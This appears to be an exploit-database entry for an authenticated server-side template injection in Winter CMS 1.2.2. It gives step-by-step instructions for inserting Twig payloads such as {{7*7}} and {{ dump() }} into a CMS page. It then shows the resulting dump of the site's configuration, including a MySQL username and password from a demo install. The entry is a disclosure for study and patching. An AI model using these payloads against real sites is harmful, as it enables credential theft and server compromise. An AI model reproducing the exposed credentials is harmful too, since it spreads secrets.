# Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated) # Exploit Author: tmrswrr # Date: 12/05/2023 # Vendor: https://wintercms.com/ # Software Link: https://github.com/wintercms/winter/releases/v1.2.2 # Vulnerable Version(s): 1.2.2 #Tested : https://www.softaculous.com/demos/WinterCMS 1 ) Login with admin cred and click CMS > Pages field > Plugin components > https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup 2 ) Write SSTI payload : {{7*7}} 3 ) Save it , Click Priview : https://demos6.demo.com/WinterCMS/demo/plugins 4 ) You will be see result : 49 Payload : {{ dump() }} Result : "*::database" => array:4 [▼ "default" => "mysql" "connections" => array:4 [▼ "sqlite" => array:5 [▼ "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite" "driver" => "sqlite" "foreign_key_constraints" => true "prefix" => "" "url" => null ] "mysql" => array:15 [▼ "charset" => "utf8mb4" "collation" => "utf8mb4_unicode_ci" "database" => "soft_pw3qsny" "driver" => "mysql" "engine" => "InnoDB" "host" => "localhost" "options" => [] "password" => "8QSz9(pT)3" "port" => 3306 "prefix" => "" "prefix_indexes" => true "strict" => true "unix_socket" => "" "url" => null "username" => "soft_pw3qsny" ] "pgsql" => array:12 [▶] "sqlsrv" => array:10 [▶] ] "migrations" => "migrations" "redis" => array:4 [▼ "client" => "phpredis" "options" => array:2 [▼ "cluster" => "redis" "prefix" => "winter_database_" ] "default" => array:5 [▼ "database" => "0" "host" => "127.0.0.1" "password" => null "port" => "6379" "url" => null ] "cache" => array:5 [▼ "database" => "1" "host" => "127.0.0.1" "password" => null "port" => "6379" "url" => null ] ] ] ]
References:
https://packetstormsecurity.com/files/176079/Winter-CMS-1.2.2-Server-Side-Template-Injection.html
https://github.com/capture0x/WInterCms-SSTI